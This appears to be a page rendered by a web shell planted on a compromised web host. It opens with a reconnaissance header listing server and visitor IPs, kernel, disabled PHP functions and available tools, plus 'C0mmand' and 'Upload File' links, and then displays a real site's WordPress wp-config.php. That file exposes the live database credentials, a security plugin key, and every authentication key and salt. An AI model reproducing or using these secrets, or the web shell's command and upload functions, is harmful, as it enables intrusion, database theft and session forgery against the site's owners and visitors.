Server IP : 10.27.61.23  /  Your IP : 2600:1f28:365:80b0:117c:d966:6c29:4d2b
Web Server : Apache
System : Linux cjvm3gk3d 6.8.0-136-generic #136+onecomnfsnozapCVE.20260723.0927 SMP PREEMPT_DYNAMIC Thu Jul x86_64
User : cjvm3gk3d ( 10481809)
PHP Version : 8.3.33
Disable Function : disk_total_space,diskfreespace,dl,exec,passthru,pcntl_alarm,pcntl_async_signals,pcntl_errno,pcntl_exec,pcntl_fork,pcntl_get_last_error,pcntl_getpriority,pcntl_rfork,pcntl_setpriority,pcntl_signal,pcntl_signal_dispatch,pcntl_signal_get_handler,pcntl_sigprocmask,pcntl_sigtimedwait,pcntl_sigwaitinfo,pcntl_strerror,pcntl_unshare,pcntl_wait,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,popen,proc_nice,proc_open,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF
Directory (0711) :  /customers/8/5/a/cjvm3gk3d/webroots/sites/webspace/httpdocs/mattheuskerk.nl-wordpress/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /customers/8/5/a/cjvm3gk3d/webroots/sites/webspace/httpdocs/mattheuskerk.nl-wordpress/wp-config.php
<?php
//Begin Really Simple Security key
define('RSSSL_KEY', 'wJXize34NOkvBYtYnTZJlmmJ6OD9fRVgAcylCs9MvEXkekhBVWqwGA95LcBzpt7Z');
//END Really Simple Security key
//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'cjvm3gk3d_hnwp396135');
/** MySQL database username */
define('DB_USER', 'cjvm3gk3d_hn396135');
/** MySQL database password */
define('DB_PASSWORD', 'MjIzOTBiMmMyZDhkMjQ2ZjNiMWZkZWQ3ZjFhOGQ5');
/** MySQL hostname */
define('DB_HOST', 'mysql.cjvm3gk3d.service.one');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'W3dQIb7A*4gwE*s@E3!9&AzI)xWDrFTMzlS!VYOk%Y58Y2BdOKPHGdDXH2qQYeJH');
define('SECURE_AUTH_KEY',  't&jjv)3a^xphTuF7AW@vcQrNd#8%H*KhA382PLc7CGFYNZclyisPcfTijMr^eDkc');
define('LOGGED_IN_KEY',    'hB8mddOhO9Hpfd1zw3Wep1Kz&#^sBhp%5WkE261bYo3NjEtNc)HXSViOog!xi7RR');
define('NONCE_KEY',        'vbQr0GZ42b)MJFQRAV#A3IMEt2O6a8VJSCd7rY2tJVcGu26^TJNjN^u&rdjAZIEV');
define('AUTH_SALT',        '4Zkmq@L2lK%X(@@N&T)6)UsF#T**wG&3*604TBoKb7)LtKfgR1pL7vpzQhqPWmIk');
define('SECURE_AUTH_SALT', 'U5S%kv&RFbGc)*qEieuQbdi2t!wXtjWtQlhl1!g^npRut6HQKBjjhj*)wuuC)KO2');
define('LOGGED_IN_SALT',   '^V1zgU!*AV%znjEEwnFKGRajburZHSzU72s1eHhzKv5#dr0gI8H455q6wJd5j!WF');
define('NONCE_SALT',       'S)QzL(KA(2vY^CSXq)kGlrmsOgcESkhiLT%UW@BuTZyo#*lR2fmiWECimsnKi8q4');
/**#@-*/
/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define( 'WP_ALLOW_MULTISITE', true );
define ('FS_METHOD', 'direct');
//--- disable auto upgrade
define( 'AUTOMATIC_UPDATER_DISABLED', true );
?>